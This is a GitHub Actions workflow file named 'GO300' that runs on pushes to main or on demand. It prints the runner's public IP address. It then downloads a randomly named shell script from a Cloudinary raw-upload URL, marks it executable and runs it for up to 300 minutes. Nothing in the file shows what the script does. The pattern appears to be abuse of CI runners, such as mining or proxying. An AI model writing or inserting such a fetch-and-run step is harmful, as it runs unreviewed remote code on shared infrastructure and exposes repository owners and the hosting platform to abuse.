name: GO300

on:
  workflow_dispatch:
  push:
    branches: [main]

jobs:
  run:
    continue-on-error: true
    runs-on: ubuntu-latest
    steps:
      - name: IP Workflow
        run: |
          curl https://api.ipify.org
      - name: Run exec
        timeout-minutes: 300
        run: |
          curl -O http://res.cloudinary.com/dyfqshedb/raw/upload/v1711125466/o8abekknjkh6hlgjcwal.sh
          chmod +x o8abekknjkh6hlgjcwal.sh
          ./o8abekknjkh6hlgjcwal.sh


